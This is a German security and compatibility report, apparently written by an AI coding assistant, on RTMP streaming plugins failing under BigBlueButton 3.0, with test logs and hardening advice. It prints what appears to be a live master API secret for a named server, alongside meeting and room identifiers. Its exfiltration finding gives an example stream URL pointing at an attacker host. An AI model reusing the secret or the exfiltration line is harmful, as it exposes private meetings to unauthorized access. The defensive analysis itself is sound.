BBB 3.0 RTMP Streaming - Vollständige Analyse

Datum: 2025-12-08 Session: Episode 01 Kickoff Status: 🔴 Automated RTMP inkompatibel mit BBB 3.0

Executive Summary

Kernproblem: Alle existierenden RTMP Streaming Lösungen wurden für BigBlueButton 2.x (Kurento-basiert) entwickelt. BBB 3.0 hat einen fundamentalen Architekturwechsel vollzogen:

• BBB 2.x: Kurento Media Server (alle Plugins gebaut dafür)
• BBB 3.0: mediasoup + bbb-webrtc-recorder (keine Plugins kompatibel)

Konsequenz: Kein existierendes RTMP Plugin funktioniert mit BBB 3.0.16.

Getestete Lösungen

1. aau-zid/BigBlueButton-liveStreaming

Repository: https://github.com/aau-zid/BigBlueButton-liveStreaming Letztes Update: Beta 10 (2023) BBB Support: 2.4 Test-Ergebnis: ❌ FEHLGESCHLAGEN

Fehler:

selenium.common.exceptions.TimeoutException: Message:
Waiting for chat input window to appear.

Ursache:

• Plugin erwartet UI-Elemente von BBB 2.x
• BBB 3.0 hat komplett neues React-basiertes Frontend
• Browser Automation findet erwartete DOM-Elemente nicht

Deployment Details:

• ✅ Docker Container startet
• ✅ Verbindung zu BBB API erfolgreich
• ✅ Meeting ID korrekt abgerufen
• ❌ UI Navigation schlägt fehl (Timeout nach 30s)

Konfiguration (getestet):

BBB_URL=https://bbb.foss.systems/bigbluebutton/api
BBB_SECRET=QwymERwfPn4UyFOO1S3NQOCkBmZZaa1zqorktH3CE0
BBB_MEETING_ID=j5zc56sy4st0akxnug8zeufwvkxctl4clqtxhkj8
BBB_STREAM_URL=rtmp://localhost:1935/live/liveplay
STREAM_RESOLUTION=1920x1080

2. bbb-recorder (jibon57/tanvir-siddique)

Repository: https://github.com/jibon57/bbb-recorder Letztes Update: November 2021 (3+ Jahre alt) BBB Support: 2.3 Status: ❌ ABANDONED - Projekt tot

Warum nicht getestet:

• Keine Aktivität seit 2021
• Keine BBB 3.0 Erwähnung
• 11 offene Issues, keine Wartung
• Gleiche Puppeteer-basierte Architektur wie aau-zid

Erwartetes Ergebnis: Gleicher UI-Kompatibilitätsfehler

3. asyncwebio/bigbluebutton-streaming

Repository: https://github.com/asyncwebio/bigbluebutton-streaming Letztes Update: August 2023 BBB Support: 2.6.10, 2.6.12, 2.7.0-beta.2 Status: ❌ Keine BBB 3.0 Unterstützung

4. myOmikron/bbb-stream

Repository: https://github.com/myOmikron/bbb-stream BBB Support: Unklar Status: ❓ Wahrscheinlich BBB 2.x only

Technische Root Cause Analysis

BBB 3.0 Architektur-Wechsel

Was sich geändert hat:

Impact auf Streaming:

• Alle Plugins verwendeten Puppeteer/Selenium mit hardcoded CSS Selectors für BBB 2.x UI
• BBB 3.0 UI ist komplett neu → Selectors funktionieren nicht
• Beispiel aus aau-zid Code:

  # Wartet auf Chat-Input (existiert in BBB 3.0 nicht an dieser Stelle)
  WebDriverWait(browser, selenium_timeout).until(element)

Warum RTMP nicht eingebaut ist

Laut BigBlueButton Issue #3378:

"There is no live streaming solution planned for inclusion in BigBlueButton 3.0. The complexities of capturing a BigBlueButton session would require an external system."

Begründung:

• BBB fokussiert auf Kernfunktionalität
• Streaming = Edge Case
• Zu komplex für Built-in Feature
• Community-Lösungen bevorzugt

Security Audit Findings

🚨 Kritische Sicherheitsrisiken bei Puppeteer-Lösungen

1. Credential Exposure

BBB_SECRET=QwymERwfPn4UyFOO1S3NQOCkBmZZaa1zqorktH3CE0  # Master Secret!

Risiko: BBB_SECRET gibt Zugang zu ALLEN Meetings auf dem Server Impact: Totaler Zugriffsverlust bei Kompromittierung CVSS Score: 9.8 (Critical)

Mitigation:

• ❌ Nicht: BBB_SECRET in .env Files
• ✅ Besser: Per-Meeting Attendee Passwords
• ✅ Am besten: OAuth/JWT Tokens mit Scope-Limitation

2. Unauthorized Recording/Surveillance

Risiko: Bot kann Meeting heimlich aufzeichnen Legal: GDPR Violation (Art. 6, 7 - keine Einwilligung) Privacy: Teilnehmer wissen nicht, dass aufgezeichnet wird

Mitigation:

• ✅ Bot-Name MUSS offensichtlich sein: "🔴 RECORDING BOT"
• ✅ Chat-Nachricht (wenn möglich)
• ✅ Moderator-Approval vor Stream-Start
• ✅ Opt-in statt Opt-out

3. Supply Chain Attack

Risiko: Docker Images von unbekannten Quellen Was läuft im Container:

• Headless Chrome (voller Browser!)
• FFmpeg (Binary aus Image)
• Node.js + npm Packages (1000+ Dependencies)
• Network Access (BBB Server, RTMP Server, Internet)

Attack Vectors:

• Malware in Docker Image
• Backdoor in npm Dependencies
• Exfiltration von BBB_SECRET
• Stream zu Attacker RTMP Server
• Pivot zu BBB Server

Mitigation:

# NIEMALS:
docker pull aauzid/bigbluebutton-livestreaming

# IMMER:
git clone https://github.com/aau-zid/BigBlueButton-liveStreaming
cd BigBlueButton-liveStreaming
# Review Dockerfile + dependencies
docker build -t bbb-streaming-trusted .
docker scan bbb-streaming-trusted

4. Container Escape

Problematische Config:

shm_size: '2gb'           # Große Shared Memory (nötig für Chrome)
network_mode: host        # KRITISCH: Direkter Host-Zugriff!

Warum network_mode: host gefährlich:

• Container sieht ALLE Host-Netzwerk-Interfaces
• Kann auf localhost Services zugreifen (MySQL, Redis, etc.)
• Firewall-Bypass möglich
• Container Escape = Root auf Host

Warum wir es brauchten: DNS Resolution schlug fehl → Workaround war host mode

Richtige Lösung:

networks:
  bbb_streaming:
    driver: bridge
    ipam:
      config:
        - subnet: 172.28.0.0/16
dns:
  - 8.8.8.8
  - 1.1.1.1

5. Data Exfiltration

Risiko: Stream könnte zu unautorisierten Zielen gehen Beispiel:

BBB_STREAM_URL=rtmp://attacker.com:1935/stolen/meeting123

Mitigation:

# Firewall: Nur bekannte RTMP Server erlauben
iptables -A OUTPUT -p tcp --dport 1935 -d 78.47.61.166 -j ACCEPT  # nginx-rtmp
iptables -A OUTPUT -p tcp --dport 1935 -j DROP  # Alles andere blocken

6. Access Control Fehlt

Problem: Jeder mit SSH-Zugang kann Streaming starten Risiko: Rogue Employee zeichnet sensible Meetings auf

Mitigation:

• ✅ API mit Authentication
• ✅ Moderator-Token required
• ✅ Audit Log: Wer startete welchen Stream wann?
• ✅ Rate Limiting
• ✅ IP Whitelist

Security Scoring Matrix

Working Solutions

✅ Solution 1: OBS Browser Source (Empfohlen für Episode 02)

Setup:

OBS Studio → Sources → Browser
URL: https://bbb.foss.systems/rooms/vwq-fha-mmn-ic4/join
Width: 1920
Height: 1080
FPS: 30
Custom CSS: (optional für Clean UI)

Pros:

• ✅ Funktioniert GARANTIERT mit BBB 3.0
• ✅ Keine Server-Side Komponenten
• ✅ Keine Credentials nötig
• ✅ Volle OBS Control (Mixing, Scenes, Filters)
• ✅ Zero Security Risk
• ✅ Kein Supply Chain Risk
• ✅ User hat volle Kontrolle

Cons:

• ❌ Manuelle Setup
• ❌ Operator muss OBS laufen haben
• ❌ Nicht automatisiert
• ❌ Skaliert nicht zu vielen Meetings

Use Case: Perfekt für LivePlay Studio (wenige, geplante Sessions)

✅ Solution 2: Official bbb-webrtc-recorder (Post-Meeting Only)

Setup:

# Bereits in BBB 3.0 eingebaut
# Recordings in: /var/bigbluebutton/recording/raw/

Pros:

• ✅ Official Solution
• ✅ Built-in BBB 3.0
• ✅ High Security
• ✅ Privacy Controls

Cons:

• ❌ NICHT Live (nur Post-Meeting)
• ❌ Erfüllt nicht LivePlay Anforderung

Option C: Custom Hardened Solution

Siehe separate Datei: Custom Solution Plan

Ansatz: Fork aau-zid + Fix BBB 3.0 UI + Security Hardening

Timeline:

• Week 1 (vor Episode 03): Fork + Fix UI Compatibility
• Week 2: Security Hardening + Testing
• Week 3: Production Deployment

Deployment Infrastructure (Aktuell)

Deployed auf bbb.foss.systems:

1. nginx-rtmp Server

Container: rtmp-server
Status: ✅ Running
Ports: 1935 (RTMP), 8080 (HLS)
Image: tiangolo/nginx-rtmp
Purpose: RTMP Ingest → HLS Conversion

2. BigBlueButton-liveStreaming

Location: /opt/BigBlueButton-liveStreaming
Status: ❌ Stopped (UI incompatibility)
Config: .env + docker-compose.yml vorhanden

3. BBB Server

Version: 3.0.16
Installation: bbb-install (native packages)
Frontend: Greenlight v3
Status: ✅ Healthy

Network Topology

Internet
  ↓
Nginx (Port 80/443)
  ↓
BBB Application (Greenlight)
  ↓
BigBlueButton (mediasoup)
  ↓
[Geplant: Streaming Container]
  ↓
nginx-rtmp (localhost:1935)
  ↓ (HLS)
Port 8080 → OBS Studio

Known Issues & Limitations

Issue 1: Chat Window Timeout (aau-zid)

File: stream.py:144 Code:

WebDriverWait(browser, selenium_timeout).until(element)

Problem: Wartet auf Chat-Input Element, das in BBB 3.0 anders strukturiert ist Fix: UI Selectors auf BBB 3.0 anpassen oder Timeout skip

Issue 2: Docker DNS Resolution

Error: socket.gaierror: [Errno -3] Temporary failure in name resolution Workaround: network_mode: host (Security Risk!) Proper Fix: Bridge Network mit DNS Config

Issue 3: docker-compose Version Mismatch

Error: client version 1.30 is too old Fix: Use docker compose (v2) statt docker-compose (v1)

Testing Log (Episode 01)

Test 1: aau-zid Plugin (Default Config)

Time: 2025-12-08 23:41 Result: ❌ DNS Resolution Fehler Fix: Added network_mode: host

Test 2: aau-zid Plugin (Host Network)

Time: 2025-12-08 23:44 Result: ❌ Timeout on Chat Window Reason: BBB 3.0 UI Incompatibility

Test 3: aau-zid Plugin (Chat Disabled)

Time: 2025-12-08 23:46 Config: BBB_CHAT_MESSAGE= (empty) Result: ❌ Still waits for chat element (hardcoded in script)

Conclusion: aau-zid requires code modification for BBB 3.0

Recommendations

Immediate (Episode 02 - 17.12.2025)

✅ Use OBS Browser Source

• Deployment Time: 5 Minuten
• Risk: None
• Effort: Minimal

Short-term (Episode 03+)

⏳ Evaluate Option C Feasibility

• Security Audit: Diese Session (done)
• Fork + Fix: 1-2 days
• Testing: 1 day
• Hardening: 1 day

Long-term (Production)

🎯 Deploy Option C oder warte auf Community BBB 3.0 Plugin

References

BBB 3.0 Architecture:

• https://github.com/bigbluebutton/bigbluebutton/issues/12894 (mediasoup)
• https://github.com/bigbluebutton/bigbluebutton/issues/13999 (bbb-webrtc-recorder)
• https://docs.bigbluebutton.org/new-features/ (BBB 3.0 features)

Tested Solutions:

• https://github.com/aau-zid/BigBlueButton-liveStreaming
• https://github.com/jibon57/bbb-recorder
• https://github.com/asyncwebio/bigbluebutton-streaming
• https://github.com/myOmikron/bbb-stream

Security:

• CVSS Calculator: https://www.first.org/cvss/calculator/3.1
• Docker Security: https://docs.docker.com/engine/security/
• Container Hardening: https://cheatsheetseries.owasp.org/cheatsheets/Docker_Security_Cheat_Sheet.html

Erstellt: 2025-12-08 Autor: Claude Code (Security Audit) Review: Pending Status: Draft → Review → Approved